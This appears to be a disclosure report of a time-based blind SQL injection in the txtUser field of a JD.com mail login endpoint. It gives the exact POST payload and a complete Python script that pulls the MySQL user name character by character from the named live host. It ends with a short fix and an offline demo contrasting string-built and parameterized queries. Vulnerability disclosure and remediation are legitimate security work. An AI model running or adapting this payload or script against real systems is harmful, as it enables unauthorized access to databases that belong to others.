MySQL injection in an important JD.com (京东商城) system (with verification script)


Detailed description:

Injection point:

Code:
POST https://mail.jd.com/Erpout/Logon.aspx

captcha=test&destination=https://mail.jd.com/owa/&flags=0&forcedownlevel=0&isflag=0&isUtf8=1&maindo=mail.jd.com&showCheck=0&trusted=4&txtPassword=test&txtUser=aaaa'XOR(if(ascii(mid(user(),1,1))=106%2cbenchmark(10000000,md5(1))%2c0))OR'bbb&__EVENTVALIDATION=/wEWBwLxrpTlDwKK4MvjBQLB2tiHDgK1qbSRCwLk6JP4DALErdS5DwKqh7gQj3wgMfb0vbvb1oZ%2bQLNUO5k2Fs0%3d&__VIEWSTATE=/wEPDwULLTEyOTM4NDQ0ODFkZJ5XXKyC0nN6Jccew80z8q/DFEs5



The txtUser parameter is injectable: MySQL time-based blind injection. With benchmark(15000000,md5(1)) the response time exceeds 2.0 s.

Proof of vulnerability:

Extracting MySQL user() character by character gives:

Code:
[Done]MySQL user is [email protected]

Code:
database():   jdmail






Python verification script:

Code:
#encoding=gbk
# Python 2 script: time-based blind extraction of user(), one character per position.
import httplib
import time
import string
import sys
import random
import urllib

headers = {'Content-Type': 'application/x-www-form-urlencoded','Cookie': 'ValiCode=PDC9BIL5P735'}

# candidate characters for each position of user()
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')

print 'start to retrieve MySQL user:'
user = ''

for i in range(1, 23):
    for payload in payloads:
        conn = httplib.HTTPSConnection('mail.jd.com', timeout=30)
        s = "captcha=test&destination=https://mail.jd.com/owa/&" \
            "flags=0&forcedownlevel=0&isflag=0&isUtf8=1&maindo=mail.jd.com&showCheck=0" \
            "&trusted=4&txtPassword=test&" \
            "txtUser=aaaa'XOR(if(ascii(mid(user(),"+str(i)+",1))="+str(ord(payload))+"%2cbenchmark(15000000,md5(1))%2c0))OR'bbb" \
            "&__EVENTVALIDATION=/wEWBwLxrpTlDwKK4MvjBQLB2tiHDgK1qbSRCwLk6JP4DALErdS5DwKqh7gQj3wgMfb0vbvb1oZ%2bQLNUO5k2Fs0%3d" \
            "&__VIEWSTATE=/wEPDwULLTEyOTM4NDQ0ODFkZJ5XXKyC0nN6Jccew80z8q/DFEs5"
        conn.request(method='POST',
                     url="/Erpout/Logon.aspx",
                     body=s,
                     headers = headers)
        start_time = time.time()
        html_doc = conn.getresponse().read()
        conn.close()
        # a slow response (benchmark() ran) means the guessed character matched
        if time.time() - start_time > 2.0:
            user += payload
            print '\n[In progress] %s' % user
            break
        else:
            print '.',

print '\n[Done]MySQL user is', user

Fix:

Escape and filter the parameter.
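As an added example (not code from the report or from JD), the vulnerable string-concatenation pattern beside the parameterized fix, run offline against a constructed SQLite table with a hypothetical users schema. The txtUser value from the report is URL-decoded and used as input; SQLite has no XOR/if()/benchmark(), so the payload surfaces there as a syntax error, which is enough to show the input reached the SQL parser (MySQL would evaluate the benchmark() instead).

```python
import sqlite3

# txtUser value from the report, URL-decoded (%2c -> ','), used here only as test input.
REPORT_PAYLOAD = ("aaaa'XOR(if(ascii(mid(user(),1,1))=106,"
                  "benchmark(10000000,md5(1)),0))OR'bbb")


def make_db():
    """Constructed in-memory table standing in for the login backend (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("o'brien", "pw")])
    return conn


def login_concat(conn, user, password):
    """Vulnerable pattern: the form values are spliced into the SQL text."""
    sql = "SELECT name FROM users WHERE name='%s' AND password='%s'" % (user, password)
    return conn.execute(sql).fetchone()


def login_param(conn, user, password):
    """Fixed pattern: bound parameters; the values never reach the SQL parser."""
    sql = "SELECT name FROM users WHERE name=? AND password=?"
    return conn.execute(sql, (user, password)).fetchone()


def probe(login_fn, user, password):
    """Report what the database saw: 'parsed' means user-controlled text became
    SQL syntax (SQLite errors on XOR/if; MySQL would run benchmark()),
    'row'/'no-row' means the value was treated purely as data."""
    try:
        row = login_fn(make_db(), user, password)
    except sqlite3.OperationalError:
        return "parsed"
    return "row" if row else "no-row"


if __name__ == "__main__":
    for fn in (login_concat, login_param):
        print(fn.__name__, probe(fn, REPORT_PAYLOAD, "test"),
              probe(fn, "o'brien", "pw"))
```

The legitimate user name with an apostrophe shows the second benefit of binding parameters: the concatenated query also breaks on ordinary input, while the parameterized one logs that user in correctly.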
